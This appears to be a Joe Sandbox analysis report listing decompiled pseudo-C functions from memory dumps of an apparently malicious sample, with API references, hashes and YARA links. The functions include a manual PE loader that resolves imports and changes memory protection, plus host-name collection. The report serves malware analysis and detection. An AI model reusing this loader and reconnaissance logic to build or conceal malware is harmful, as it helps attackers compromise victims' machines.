Opcode ID: aaec94ddd6559d493ff0042477cd54d22d5b643fad5062c311129f29b063875e
Instruction ID: cfd1edd3f5047d817981f85ea2e92000f8639cf3c83937f081454ccb4634f6ee
Opcode Fuzzy Hash: aaec94ddd6559d493ff0042477cd54d22d5b643fad5062c311129f29b063875e
Instruction Fuzzy Hash: 6401843571020ABBDF215F69DC54E9F3BB9FF84714F008029FA809A1A0DAB2D955DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00401A88 Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401A88(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401a92
0x00401a9f
0x00401aa5
0x00401ab1
0x00401ac1
0x00401ac3
0x00401acb
0x00401b60
0x00401b67
0x00000000
0x00000000
0x00000000
0x00401ad1
0x00401ad1
0x00401ad1
0x00401ad5
0x00000000
0x00000000
0x00401ae1
0x00401ae5
0x00401b09
0x00401b0d
0x00401b21
0x00401b21
0x00401b27
0x00401b36
0x00401b3a
0x00401b42
0x00401b42
0x00401b4a
0x00401b4d
0x00401b5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b5a
0x00401b15
0x00401b19
0x00401b1f
0x00000000
0x00000000
0x00000000
0x00401b1f
0x00401aed
0x00401af1
0x00401afb
0x00401af3
0x00401af3
0x00401af3
0x00000000
0x00401af1
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401AC1
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401B36
GetLastError.KERNEL32 ref: 00401B3C

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
Instruction ID: f32d11d6171dd66a2aa87c7aaa419f9d8d469986a815ac39be6b4f505c02cff5
Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
Instruction Fuzzy Hash: 7A214D71800309DFCB14CF95C9859BAF7B4FB18345F0144AAD602E7164E7B8BA68CB58

Uniqueness

Uniqueness Score: -1.00%

Function 01093297 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E01093297(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E01096A51(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x1099278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x0109329b
0x010932a8
0x010932aa
0x010932ab
0x010932b3
0x010932b3
0x010932b7
0x00000000
0x00000000
0x010932ae
0x010932af
0x010932b2
0x010932b2
0x010932bf
0x010932c4
0x010932c9
0x010932d1
0x010932d7
0x010932d9
0x010932dc
0x010932e0
0x010932e2
0x010932e5
0x010932e5
0x010932e6
0x010932e8
0x010932e5
0x010932f2
0x010932f5
0x010932f8
0x010932f9
0x010932fb
0x01093302
0x01093302
0x0109330e

APIs

StrChrA.SHLWAPI(?,00000020,00000000,01B095FC,?,?,01094658,?,01B095FC), ref: 010932B3
StrTrimA.KERNELBASE(?,01099278,00000002,?,01094658,?,01B095FC), ref: 010932D1
StrChrA.SHLWAPI(?,00000020,?,01094658,?,01B095FC), ref: 010932DC

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 721424e48baba843b71e8d80fb8c27cd124973d2830e3f33c9179f4210084ce0
Instruction ID: fca7e7b53b124209eecaa8e02120f48806f30f4b77a1e4afcbb007d23a95f3fa
Opcode Fuzzy Hash: 721424e48baba843b71e8d80fb8c27cd124973d2830e3f33c9179f4210084ce0
Instruction Fuzzy Hash: EA01B171304356AFEB204A7A8C69F677FDDFB85340F144092BAD6CF282DA30C841DA60

Uniqueness

Uniqueness Score: -1.00%

Function 0109692B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0109692B(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x109a2d8, 0, _a4); // executed
				return _t2;
			}

0x01096937
0x0109693d

APIs

RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

Strings

Uqt, xrefs: 01096937

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: bb7dba6257ff95ec7369ec97144fbc0ff9c0c1be99ed49d7c58e690be6435dfb
Instruction ID: ffaa831a8bceecbf89d34d94d1a410efc516af79a4143cdc57f603860814c317
Opcode Fuzzy Hash: bb7dba6257ff95ec7369ec97144fbc0ff9c0c1be99ed49d7c58e690be6435dfb
Instruction Fuzzy Hash: F9B01271204200EFCB314B00DE14F057A21B794700F004014B384000B882370420FB15

Uniqueness

Uniqueness Score: -1.00%

Function 01092E7B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01092E7B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E010950B7(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x109a348; // 0xa6d5a8
						_t20 = _t68 + 0x109b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E010961E8(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x01092e81
0x01092e84
0x01092e94
0x01092e9d
0x01092ea1
0x01092f6f
0x01092f75
0x01092f75
0x01092ebb
0x01092ec0
0x01092ec4
0x01092eca
0x01092ecf
0x01092ed6
0x01092ee5
0x01092ee5
0x01092ee9
0x01092eeb
0x01092ef7
0x01092f02
0x01092f0d
0x01092f11
0x01092f1b
0x01092f1f
0x01092f21
0x01092f26
0x01092f2d
0x01092f3d
0x01092f3d
0x01092f26
0x01092f1f
0x01092f3f
0x01092f44
0x01092f49
0x01092f49
0x01092f4c
0x01092f55
0x01092f5a
0x01092f5a
0x01092f5f
0x01092f64
0x01092f64
0x01092f5f
0x01092ee9
0x01092f66
0x01092f6c
0x00000000

APIs

Part of subcall function 010950B7: SysAllocString.OLEAUT32(80000002), ref: 01095114
Part of subcall function 010950B7: SysFreeString.OLEAUT32(00000000), ref: 0109517A

SysFreeString.OLEAUT32(?), ref: 01092F5A
SysFreeString.OLEAUT32(010920DA), ref: 01092F64

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5621c49fc9dba1aaff7141611ae8dcdd3868a0833f6a3a1e52d7e11ba17f07b8
Instruction ID: 96e168a20daffbec58a45c78b3d3e5349c235e33ef98c79c428b2201fdce752c
Opcode Fuzzy Hash: 5621c49fc9dba1aaff7141611ae8dcdd3868a0833f6a3a1e52d7e11ba17f07b8
Instruction Fuzzy Hash: 9E313772500119BFCF21EF58CCA8C9BBBBAFBC974071446A8F9469B214D7329D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040171E Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040171E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x0040171e
0x00401727
0x0040172c
0x00401732
0x0040173b
0x00401741
0x00401743
0x00401746
0x0040174b
0x00401752
0x00401752
0x00401756
0x0040175c
0x00401761
0x00000000
0x00000000
0x00401767
0x00401771
0x00401773
0x00401776
0x00401779
0x0040177d
0x00401785
0x00401787
0x0040178a
0x004017f2
0x004017f2
0x004017f6
0x00000000
0x00000000
0x0040178f
0x00401795
0x00401797
0x004017aa
0x004017ad
0x004017ad
0x004017ad
0x004017b1
0x00401799
0x00401799
0x004017a1
0x004017a3
0x00000000
0x00000000
0x00000000
0x00000000
0x004017a3
0x00401791
0x00401791
0x004017a5
0x004017a5
0x004017a5
0x004017b4
0x004017b7
0x004017b9
0x004017c0
0x004017bb
0x004017bb
0x004017bb
0x004017c8
0x004017ce
0x004017d0
0x00401800
0x004017d2
0x004017d2
0x004017d5
0x004017d7
0x004017df
0x004017df
0x004017e4
0x004017e6
0x004017ed
0x004017ef
0x004017ef
0x004017ef
0x00000000
0x004017ef
0x00000000
0x004017d0
0x0040177f
0x0040177f
0x00401783
0x00000000
0x00000000
0x00401783
0x00401803
0x00401803
0x0040180a
0x0040180f
0x00000000
0x00000000
0x00401815
0x00401820
0x00000000
0x00401820
0x00401817
0x00401817
0x0040181d
0x00000000
0x0040181d
0x0040174b
0x00401821
0x00401826

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401756
GetProcAddress.KERNEL32(?,00000000), ref: 004017C8

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
Instruction ID: 99a84c3d3c52fc79e8e01ccc32a65c1a183593383b808a84fef0d53d2d0e1083
Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
Instruction Fuzzy Hash: DF311A75A00206DFDB15CF59C994AAEB7F4FF44311B24407AD801EB3A0E778DA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401E51 Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E51() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403184;
				if( *0x40316c > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E00401876(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				_t24 = E00401C32( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x403178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E0040189C(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x403178;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x403178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401F20(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E004014DF(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00401e57
0x00401e68
0x00401e72
0x00401e6a
0x00401e6a
0x00401e6a
0x00401e79
0x00401e82
0x00401e87
0x00401e9e
0x00401ea5
0x00401f02
0x00401ea7
0x00401ead
0x00401eb3
0x00401ec1
0x00401ec5
0x00401ecc
0x00401ece
0x00401ed4
0x00401ed8
0x00401ee0
0x00401ef1
0x00401ee2
0x00401ee8
0x00401ee8
0x00401ee0
0x00401ef9
0x00401ef9
0x00401f04

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00401EAD
ExitThread.KERNEL32 ref: 00401F04

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 0322cd87ada09ea54292c2fad7f3718e47c545a75c6519401737e8030c44b873
Instruction ID: eac9e3a36576fb8f380d495d46173dcf8ce949717d93710fe5cc7838fdad819d
Opcode Fuzzy Hash: 0322cd87ada09ea54292c2fad7f3718e47c545a75c6519401737e8030c44b873
Instruction Fuzzy Hash: E211D072508205AAE711DF65CD09E5B77ECAB48304F04483BBA05F71B0EB34EA098B9E

Uniqueness

Uniqueness Score: -1.00%

Function 01096A66 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01096A66(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E010954A0(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x109a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E01093D20(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x01096a66
0x01096a6e
0x01096a85
0x01096aa0
0x01096aa4
0x01096aa9
0x01096aab
0x01096abd
0x01096ac9
0x01096aad
0x01096aad
0x01096ab2
0x01096ab7
0x01096ab7
0x01096aab
0x01096acf
0x01096ad3
0x01096ad3
0x01096a7a
0x01096a7f
0x01096a83
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 01093D20: SysFreeString.OLEAUT32(00000000), ref: 01093D83

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,01095EA6,?,004F0053,01B093D8,00000000,?), ref: 01096AC9

Strings

Uqt, xrefs: 01096AC9

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Free$HeapString
String ID: Uqt
API String ID: 3806048269-2320327147
Opcode ID: c481739f61ceb3823e5ba558576988943efef2304a6654b59e35fb0381592ae0
Instruction ID: 4d1974968a04da10742b0b551641447ada1179b0c6ee597bafc7bbaf920807ee
Opcode Fuzzy Hash: c481739f61ceb3823e5ba558576988943efef2304a6654b59e35fb0381592ae0
Instruction Fuzzy Hash: CA012C32100519BBDF229F59CC20EDA3BA5EF44750F04C024FE499A120D7368960EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0109131C Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0109131C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E01096A51(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0109692B(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x01091321
0x0109132c
0x0109132e
0x01091334
0x01091336
0x0109133b
0x01091344
0x01091348
0x01091351
0x01091355
0x01091364
0x01091357
0x01091358
0x0109135d
0x0109135d
0x01091355
0x01091348
0x0109136d

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,0109374D,00000000,00000000,?,775EC740,0109374D), ref: 01091334

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

GetComputerNameExA.KERNELBASE(00000003,00000000,0109374D,0109374E,?,775EC740,0109374D), ref: 01091351

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: d211b354ae1634f1f3b987242ce95ceae57510c5656100d7b6d3cbc207c49761
Instruction ID: 5a91a2613d9f8801bda9cc72a15f284cae57b6bb8c770c96a3045a673d8d15c7
Opcode Fuzzy Hash: d211b354ae1634f1f3b987242ce95ceae57510c5656100d7b6d3cbc207c49761
Instruction Fuzzy Hash: AEF05436700206BAEF11D69A8C21EAF7AFCEBC5664F118199B995D3140EA71DE01A770

Uniqueness

Uniqueness Score: -1.00%

Function 01091068 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01091068(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x109a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x109a1c8 = GetTickCount();
				_t5 = E010913E8(_a4);
				if(_t5 == 0) {
					_t5 = E010928A7(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E01096068(_t9) != 0) {
							 *0x109a300 = 1; // executed
						}
						_t7 = E01091C88(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x01091068
0x01091071
0x01091077
0x0109107e
0x01091082
0x00000000
0x01091082
0x0109108f
0x01091094
0x0109109b
0x010910a1
0x010910a8
0x010910b1
0x010910b3
0x010910b3
0x010910bd
0x00000000
0x010910bd
0x010910a8
0x010910c2

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,010918EE,?), ref: 01091071
GetTickCount.KERNEL32 ref: 01091085

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 62062c5990947d86b0a957b6e8ad9650c30f573bcdc5f55697762e2643cfe48c
Instruction ID: 256bc58b5f2c7f99e7e3a3d582f20046da1f9b2a1ae6679bad3fa373e9fa68cf
Opcode Fuzzy Hash: 62062c5990947d86b0a957b6e8ad9650c30f573bcdc5f55697762e2643cfe48c
Instruction Fuzzy Hash: 3AF06D70744343AAEF712B74987971A36E47B94768F1082A9F9C4D6181EBB7C000BB21

Uniqueness

Uniqueness Score: -1.00%

Function 01093D20 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E01093D20(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
